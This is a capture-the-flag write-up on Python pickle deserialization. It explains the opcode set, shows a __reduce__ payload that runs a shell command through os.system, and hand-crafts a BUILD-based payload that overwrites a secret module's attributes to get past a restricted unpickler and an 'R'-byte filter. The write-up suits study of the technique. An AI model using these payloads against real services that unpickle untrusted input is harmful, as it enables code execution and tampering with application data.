Pickle deserialization -- University Anti-"Epidemic" Cybersecurity Sharing Competition (高校抗“疫”網絡安全分享賽)


What is Pickle?

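Introduction

A few days ago I read an article by p牛 on pickle deserialization, and a competition happened to include a challenge on it, which gave me a hands-on chance to deepen my understanding. First, then, I need to know what pickle deserialization actually is.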

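pickle is a stack-based language that runs on a lightweight PVM (Pickle Virtual Machine). The PVM consists mainly of an instruction processor, a stack, and a memo.

  • Instruction processor: parses and executes opcodes and their arguments. The value left on top of the stack at the end is returned as the deserialized object.
  • stack: temporary storage for data, arguments, and objects; implemented as a Python list, and comparable to a computer's memory
  • memo: storage that persists for the whole lifetime of the PVM; implemented as a Python dict, and comparable to a computer's disk storage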
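As a small illustration of how the stack and the memo work together, the sketch below feeds a hand-written protocol 0 byte string to pickle.loads. The byte string is an illustrative example of my own, not something taken from the challenge.

```python
import pickle

# (      MARK: push a marker onto the stack
# I1\n   push the integer 1
# I2\n   push the integer 2
# l      LIST: pop everything above the marker and push [1, 2]
# p0\n   PUT: copy the top of the stack into memo slot 0
# 0      POP: discard the list, leaving the stack empty
# g0\n   GET: push the object stored in memo slot 0 back onto the stack
# .      STOP: return the top of the stack
data = b"(I1\nI2\nlp0\n0g0\n."

result = pickle.loads(data)
print(result)
```

The list survives the POP only because PUT stored it in the memo first, which is the "disk storage" role described above.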

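Instruction set

Five pickle protocols are described here (Python 3.8 has since added a sixth, protocol 5). The higher the protocol version used, the more recent the version of Python needed to read the pickle produced.

  • Protocol v0 is the original "human-readable" protocol and is backwards compatible with earlier versions of Python.
  • Protocol v1 is an old binary format that is also compatible with earlier versions of Python.
  • Protocol v2 was introduced in Python 2.3. It provides a much more efficient mechanism for pickling new-style classes. See PEP 307 for the improvements brought by protocol 2.
  • Protocol v3 was added in Python 3.0. It has explicit support for bytes objects and cannot be unpickled by Python 2.x. It was the default protocol at the time of writing (Python 3.0 through 3.7) and is the recommended protocol when compatibility with other Python 3 versions is required.
  • Protocol v4 was added in Python 3.4. It supports very large objects, can pickle more kinds of objects, and includes some data format optimizations. See PEP 3154 for the improvements brought by protocol 4.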
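To make the difference between the protocols concrete, here is a minimal sketch that pickles the same object under protocols 0 through 4 and records the first two bytes of each result. The sample dict is an arbitrary value chosen for illustration.

```python
import pickle

obj = {"name": "giaogiao"}  # arbitrary sample value

headers = {}
for proto in range(0, 5):
    data = pickle.dumps(obj, protocol=proto)
    headers[proto] = data[:2]
    # every protocol round-trips to an equal object
    assert pickle.loads(data) == obj
    print(proto, data)

# The default and highest protocols depend on the running Python version
print(pickle.DEFAULT_PROTOCOL, pickle.HIGHEST_PROTOCOL)
```

From protocol 2 onward the output starts with the PROTO opcode (\x80) followed by the protocol number, while protocols 0 and 1 have no such header.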

The full instruction set can be looked up in the pickle source code; it is reproduced below (it is long, so feel free to skip it).

# Pickle opcodes.  See pickletools.py for extensive docs.  The listing
# here is in kind-of alphabetical order of 1-character pickle code.
# pickletools groups them by purpose.

MARK           = b'('   # push special markobject on stack
STOP           = b'.'   # every pickle ends with STOP
POP            = b'0'   # discard topmost stack item
POP_MARK       = b'1'   # discard stack top through topmost markobject
DUP            = b'2'   # duplicate top stack item
FLOAT          = b'F'   # push float object; decimal string argument
INT            = b'I'   # push integer or bool; decimal string argument
BININT         = b'J'   # push four-byte signed int
BININT1        = b'K'   # push 1-byte unsigned int
LONG           = b'L'   # push long; decimal string argument
BININT2        = b'M'   # push 2-byte unsigned int
NONE           = b'N'   # push None
PERSID         = b'P'   # push persistent object; id is taken from string arg
BINPERSID      = b'Q'   #  "       "         "  ;  "  "   "     "  stack
REDUCE         = b'R'   # apply callable to argtuple, both on stack
STRING         = b'S'   # push string; NL-terminated string argument
BINSTRING      = b'T'   # push string; counted binary string argument
SHORT_BINSTRING= b'U'   #  "     "   ;    "      "       "      " < 256 bytes
UNICODE        = b'V'   # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE     = b'X'   #   "     "       "  ; counted UTF-8 string argument
APPEND         = b'a'   # append stack top to list below it
BUILD          = b'b'   # call __setstate__ or __dict__.update()
GLOBAL         = b'c'   # push self.find_class(modname, name); 2 string args
DICT           = b'd'   # build a dict from stack items
EMPTY_DICT     = b'}'   # push empty dict
APPENDS        = b'e'   # extend list on stack by topmost stack slice
GET            = b'g'   # push item from memo on stack; index is string arg
BINGET         = b'h'   #   "    "    "    "   "   "  ;   "    " 1-byte arg
INST           = b'i'   # build & push class instance
LONG_BINGET    = b'j'   # push item from memo on stack; index is 4-byte arg
LIST           = b'l'   # build list from topmost stack items
EMPTY_LIST     = b']'   # push empty list
OBJ            = b'o'   # build & push class instance
PUT            = b'p'   # store stack top in memo; index is string arg
BINPUT         = b'q'   #   "     "    "   "   " ;   "    " 1-byte arg
LONG_BINPUT    = b'r'   #   "     "    "   "   " ;   "    " 4-byte arg
SETITEM        = b's'   # add key+value pair to dict
TUPLE          = b't'   # build tuple from topmost stack items
EMPTY_TUPLE    = b')'   # push empty tuple
SETITEMS       = b'u'   # modify dict by adding topmost key+value pairs
BINFLOAT       = b'G'   # push float; arg is 8-byte float encoding

TRUE           = b'I01\n'  # not an opcode; see INT docs in pickletools.py
FALSE          = b'I00\n'  # not an opcode; see INT docs in pickletools.py

# Protocol 2

PROTO          = b'\x80'  # identify pickle protocol
NEWOBJ         = b'\x81'  # build object by applying cls.__new__ to argtuple
EXT1           = b'\x82'  # push object from extension registry; 1-byte index
EXT2           = b'\x83'  # ditto, but 2-byte index
EXT4           = b'\x84'  # ditto, but 4-byte index
TUPLE1         = b'\x85'  # build 1-tuple from stack top
TUPLE2         = b'\x86'  # build 2-tuple from two topmost stack items
TUPLE3         = b'\x87'  # build 3-tuple from three topmost stack items
NEWTRUE        = b'\x88'  # push True
NEWFALSE       = b'\x89'  # push False
LONG1          = b'\x8a'  # push long from < 256 bytes
LONG4          = b'\x8b'  # push really big long

# Protocol 3 (Python 3.x)

BINBYTES       = b'B'   # push bytes; counted binary string argument
SHORT_BINBYTES = b'C'   #  "     "   ;    "      "       "      " < 256 bytes

# Protocol 4
SHORT_BINUNICODE = b'\x8c'  # push short string; UTF-8 length < 256 bytes
BINUNICODE8      = b'\x8d'  # push very long string
BINBYTES8        = b'\x8e'  # push very long bytes string
EMPTY_SET        = b'\x8f'  # push empty set on the stack
ADDITEMS         = b'\x90'  # modify set by adding topmost stack items
FROZENSET        = b'\x91'  # build frozenset from topmost stack items
NEWOBJ_EX        = b'\x92'  # like NEWOBJ but work with keyword only arguments
STACK_GLOBAL     = b'\x93'  # same as GLOBAL but using names on the stacks
MEMOIZE          = b'\x94'  # store top of the stack in memo
FRAME            = b'\x95'  # indicate the beginning of a new frame
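Rather than scanning the listing by eye, individual opcodes can also be looked up programmatically. The sketch below uses the code2op table from the standard pickletools module; the choice of opcodes to look up is mine.

```python
import pickletools

# code2op maps a one-character opcode (as str) to its OpcodeInfo record
codes = ("c", "R", "b", "\x81")
names = {}
for code in codes:
    info = pickletools.code2op[code]
    names[code] = info.name
    # info.proto is the protocol version that introduced the opcode
    print(repr(code), info.name, "protocol", info.proto)
```

Each OpcodeInfo record also carries a doc attribute with the long description that pickletools.py provides for that opcode.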

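Pickle serialization

Pickle payloads are mainly produced in two ways: through the __reduce__ magic method, or by writing the opcodes by hand.

  • The __reduce__ method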

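    import os
    import pickle

    class exp(object):
        def __reduce__(self):
            s = r"""touch /tmp/success"""
            # on unpickling, the callable is applied to the argument tuple
            return (os.system, (s,))

    print(pickle.dumps(exp(), protocol=0))
    # output on Windows, where os.system is nt.system (on Linux the module is posix):
    # b'cnt\nsystem\np0\n(Vtouch /tmp/success\np1\ntp2\nRp3\n.'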
    
  • Hand-written opcodes, which can be debugged and analyzed with pickletools

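    $ python -m pickletools pickle.txt
        0: c    GLOBAL     'nt system' # push the callable `nt.system` (os.system on Windows; `posix.system` on Linux) onto the stack
       11: p    PUT        0  # store this object in memo slot 0
       14: (    MARK   # push the marker for the start of a tuple
       15: V        UNICODE    'touch /tmp/success'  # push a string
       35: p        PUT        1   # store this string in memo slot 1
       38: t        TUPLE      (MARK at 14) # pop the elements pushed since the MARK and push a tuple built from them
       39: p    PUT        2  # store this tuple in memo slot 2
       42: R    REDUCE  # pop two elements, the callable and the tuple, call the callable with the tuple as arguments, and push the result
       43: p    PUT        3 # store the top of the stack (the result of the call) in memo slot 3
       46: .    STOP # end
    highest protocol among opcodes = 0 # protocol v0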
    
    >>>b'''cnt
    system
    p0
    (Vtouch /tmp/success
    p1
    tp2
    Rp3
    .'''
    

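    Note: conventions for writing PVM instructions
    (1) An opcode is a single byte
    (2) The arguments of the text-based (protocol 0) opcodes are delimited by newlines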
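The hand-writing workflow can be tried safely with a harmless callable. The sketch below has the same structure as the os.system payload above, but calls builtins.len instead (my substitution, so that nothing is executed on the system), and disassembles it with pickletools.dis before loading it.

```python
import io
import pickle
import pickletools

# c builtins / len   GLOBAL: push the callable builtins.len
# (                  MARK
# Vabc               UNICODE: push the string 'abc'
# t                  TUPLE: build ('abc',)
# R                  REDUCE: call len('abc') and push the result
# .                  STOP
payload = b"cbuiltins\nlen\n(Vabc\ntR."

# Disassemble without executing anything
out = io.StringIO()
pickletools.dis(payload, out=out)
listing = out.getvalue()
print(listing)

# Only now actually run the payload
result = pickle.loads(payload)
print(result)
```

Disassembling first is a useful habit: pickletools.dis only parses the opcodes, whereas pickle.loads executes them.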

Challenge analysis

The challenge is named webtmp; its source code follows.

import base64
import io
import sys
import pickle

from flask import Flask, Response, render_template, request
import secret

app = Flask(__name__)

class Animal:
    def __init__(self, name, category):
        self.name = name
        self.category = category

    def __repr__(self):
        return f'Animal(name={self.name!r}, category={self.category!r})'

    def __eq__(self, other):
        return type(other) is Animal and self.name == other.name and self.category == other.category

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == '__main__':
            return getattr(sys.modules['__main__'], name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

def restricted_loads(s):
    return RestrictedUnpickler(io.BytesIO(s)).load()

def read(filename, encoding='utf-8'):
    with open(filename, 'r', encoding=encoding) as fin:
        return fin.read()

@app.route('/', methods=['GET', 'POST'])
def index():
    if request.args.get('source'):
        return Response(read(__file__), mimetype='text/plain')

    if request.method == 'POST':
        try:
            pickle_data = request.form.get('data')
            if b'R' in base64.b64decode(pickle_data):
                return 'No... I don\'t like R-things. No Rabits, Rats, Roosters or RCEs.'
            else:
                result = restricted_loads(base64.b64decode(pickle_data))
                if type(result) is not Animal:
                    return 'Are you sure that is an animal???'
            correct = (result == Animal(secret.name, secret.category))
            return render_template('unpickle_result.html', result=result, pickle_data=pickle_data, giveflag=correct)
        except Exception as e:
            print(repr(e))
            return "Something wrong"

    sample_obj = Animal('giaogiao', 'Giao')
    pickle_data = base64.b64encode(pickle.dumps(sample_obj)).decode()
    return render_template('unpickle_page.html', sample_obj=sample_obj, pickle_data=pickle_data)

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)

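Two key points are easy to spot:

  • The input is unpickled, but find_class only allows the module sys.modules['__main__']
  • When correct is True, the flag is returned

Judging from that condition, we need to deserialize an Animal object whose attributes equal name and category in secret; that passes the check and yields the flag.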
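The two server-side defenses can be reproduced locally. The sketch below copies RestrictedUnpickler from the challenge source; the helper passes_r_filter is a hypothetical name of mine that mirrors the b'R' check in index(). The REDUCE payload is only inspected, never loaded.

```python
import base64
import io
import pickle
import sys

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == '__main__':
            return getattr(sys.modules['__main__'], name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

def passes_r_filter(b64_data):
    # mirrors the server-side check: any 'R' byte (0x52) is rejected
    return b'R' not in base64.b64decode(b64_data)

# A classic REDUCE payload contains the 'R' opcode, so the filter blocks it
reduce_payload = b"cos\nsystem\n(Vecho hi\ntR."
r_allowed = passes_r_filter(base64.b64encode(reduce_payload))
print(r_allowed)

# Even without 'R', a global outside __main__ is refused by find_class
try:
    RestrictedUnpickler(io.BytesIO(b"cos\nsystem\n.")).load()
    rejected = False
except pickle.UnpicklingError as exc:
    rejected = True
    print(exc)
```

Note that the filter looks at raw bytes, so an uppercase R anywhere in the payload, including inside a string, is enough to be rejected.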

secret.py is not provided with the challenge, but it is not hard to guess roughly what it looks like:

# secret.py
name="xxx"
category="?????"
# test: run in the main module, after `import sys` and `import secret`
a = sys.modules['__main__'].secret.name
print(a) # xxx

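From here there are a couple of possible approaches:

  • Read the values of name and category from secret, then use them to create the Animal object
  • Overwrite the values of name and category, then create the Animal object from the values we wrote

For the first approach, after various attempts, I could not find a way to reach __main__.secret.name. find_class performs a single getattr on __main__, so a dotted name such as secret.name is not resolved.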
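The obstacle can be seen with a small sketch. fake_main and its secret attribute are hypothetical stand-ins for the challenge's __main__ and secret modules; the two getattr calls imitate what find_class would do with the names secret and secret.name.

```python
import types

# Hypothetical stand-ins for the challenge's __main__ and secret modules
fake_main = types.ModuleType("fake_main")
fake_main.secret = types.ModuleType("secret")
fake_main.secret.name = "xxx"

# A single name resolves to the module object...
module_obj = getattr(fake_main, "secret")
print(module_obj.name)

# ...but a dotted name is treated as one attribute name and fails
try:
    getattr(fake_main, "secret.name")
    dotted_ok = True
except AttributeError:
    dotted_ok = False
print(dotted_ok)
```

So the GLOBAL opcode can hand us the secret module itself, but not the strings stored inside it.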

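So I turned to the second approach. While reading through the documentation for the various pickle protocols, I found in the protocol 2 documentation that attribute values can be changed during deserialization. The corresponding opcode is: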

BUILD          = b'b'   # call __setstate__ or __dict__.update()

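Now the plan is fairly clear: overwrite the attribute values first, then create the Animal object. The next step is to write the pickle opcodes by hand.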
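The effect of BUILD on an object without __setstate__ can be checked in isolation. In the sketch below, target is a hypothetical stand-in module, and DemoUnpickler is an illustrative unpickler whose find_class returns that stand-in so the example does not depend on what __main__ is.

```python
import io
import pickle
import types

target = types.ModuleType("target")  # hypothetical stand-in object
target.name = "original"

class DemoUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # only the stand-in is reachable in this demo
        if (module, name) == ("__main__", "target"):
            return target
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

# c__main__ / target   GLOBAL: push the target object
# }                    EMPTY_DICT: push {}
# S'name' S'changed' s SETITEM: the dict becomes {'name': 'changed'}
# b                    BUILD: update target.__dict__ from the dict
# .                    STOP: return the top of the stack (the target)
payload = b"c__main__\ntarget\n}S'name'\nS'changed'\nsb."

returned = DemoUnpickler(io.BytesIO(payload)).load()
print(target.name)
```

No REDUCE opcode is involved, so a payload of this shape is not caught by a filter on the byte 'R'.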

Building the payload

import base64
import pickle

# Part 1 of the payload: push the secret module, build a dict, and let BUILD overwrite the module's attributes
payload_1 = b'''c__main__
secret
}S'name'
S'xxxxx'
sS'category'
S'yyyyy'
sb.'''
# Part 2 of the payload: construct the object (Animal is the class from the challenge source)
exp = Animal("xxxxx","yyyyy")
payload_2 = pickle.dumps(exp, protocol=3)  # protocol 3 matches the bytes shown below
#b'''\x80\x03c__main__\nAnimal\nq\x00)\x81q\x01}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00xxxxxq\x04X\x08\x00\x00\x00categoryq\x05X\x05\x00\x00\x00yyyyyq\x06ub.'''
# Merge the payloads: drop the trailing '.' (STOP) of part 1 and the leading \x80\x03 (PROTO) of part 2
payload = b'''c__main__
secret
}S'name'
S'xxxxx'
sS'category'
S'yyyyy'
sbc__main__\nAnimal\nq\x00)\x81q\x01}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00xxxxxq\x04X\x08\x00\x00\x00categoryq\x05X\x05\x00\x00\x00yyyyyq\x06ub.'''

print(base64.b64encode(payload))
#Y19fbWFpbl9fCnNlY3JldAp9UyduYW1lJwpTJ3h4eHh4JwpzUydjYXRlZ29yeScKUyd5eXl5eScKc2JjX19tYWluX18KQW5pbWFsCnEAKYFxAX1xAihYBAAAAG5hbWVxA1gFAAAAeHh4eHhxBFgIAAAAY2F0ZWdvcnlxBVgFAAAAeXl5eXlxBnViLg==
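The merged payload can be checked locally before it is sent. The sketch below is an offline approximation under stated assumptions: secret is a stand-in module holding the guessed placeholder values, Animal is a trimmed copy of the challenge class, and DemoUnpickler replaces the lookup in sys.modules['__main__'] with a small table so the example runs anywhere.

```python
import io
import pickle
import types

class Animal:
    def __init__(self, name, category):
        self.name = name
        self.category = category

    def __eq__(self, other):
        return type(other) is Animal and self.name == other.name and self.category == other.category

# Stand-in for the unknown secret.py (values are placeholders)
secret = types.ModuleType("secret")
secret.name = "xxx"
secret.category = "?????"

ALLOWED = {"secret": secret, "Animal": Animal}

class DemoUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # approximates getattr(sys.modules['__main__'], name)
        if module == "__main__" and name in ALLOWED:
            return ALLOWED[name]
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

# Same bytes as the merged payload above, split across lines for readability
payload = (
    b"c__main__\nsecret\n}S'name'\nS'xxxxx'\nsS'category'\nS'yyyyy'\nsb"
    b"c__main__\nAnimal\nq\x00)\x81q\x01}q\x02(X\x04\x00\x00\x00nameq\x03"
    b"X\x05\x00\x00\x00xxxxxq\x04X\x08\x00\x00\x00categoryq\x05"
    b"X\x05\x00\x00\x00yyyyyq\x06ub."
)

result = DemoUnpickler(io.BytesIO(payload)).load()
# By the time the comparison runs, secret has already been overwritten
correct = (result == Animal(secret.name, secret.category))
print(type(result).__name__, correct)
```

The first half leaves the secret module on the stack, but STOP returns only the topmost item, which is the Animal instance, so the type check in the challenge is also satisfied.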

Getflag
